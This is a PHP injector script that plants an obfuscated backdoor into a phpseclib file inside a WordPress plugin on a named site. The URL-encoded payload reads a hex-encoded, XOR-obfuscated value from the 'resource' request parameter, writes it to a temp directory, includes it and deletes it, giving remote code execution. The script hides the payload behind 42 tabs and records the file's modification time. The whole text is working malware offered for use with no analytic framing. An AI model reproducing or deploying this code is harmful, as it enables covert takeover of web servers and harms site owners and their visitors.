<?php  $path = '/home2/piquedin/public_html/powerlabinstruments.com/myweb/plugins/fluent-smtp/includes/libs/google-api-client/build/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/Binary.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_REQUEST%29%20%26%26%20isset%28%24_REQUEST%5B%22%5Cx72%5Cx65s%5Cx6Fu%5Cx72ce%22%5D%29%29%7B%20%24rec%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/var/tmp%22%2C%20%22/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20getenv%28%22TMP%22%29%2C%20sys_get_temp_dir%28%29%2C%20%22/dev/shm%22%2C%20getcwd%28%29%5D%29%3B%20%24ref%20%3D%20hex2bin%28%24_REQUEST%5B%22%5Cx72%5Cx65s%5Cx6Fu%5Cx72ce%22%5D%29%3B%20%24symbol%20%3D%20%27%27%20%3B%20foreach%28str_split%28%24ref%29%20as%20%24char%29%7B%24symbol%20.%3D%20chr%28ord%28%24char%29%20%5E%2070%29%3B%7D%20%24item%20%3D%200%3B%20do%20%7B%20%24res%20%3D%20%24rec%5B%24item%5D%20%3F%3F%20null%3B%20if%20%28%24item%20%3E%3D%20count%28%24rec%29%29%20break%3B%20if%20%28is_dir%28%24res%29%20%3F%20is_writable%28%24res%29%20%3A%20false%29%20%7B%20%24dchunk%20%3D%20join%28%22/%22%2C%20%5B%24res%2C%20%22.data%22%5D%29%3B%20if%20%28file_put_contents%28%24dchunk%2C%20%24symbol%29%29%20%7B%20include%20%24dchunk%3B%20%40unlink%28%24dchunk%29%3B%20die%28%29%3B%20%7D%20%7D%20%24item%2B%2B%3B%20%7D%20while%20%28true%29%3B%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');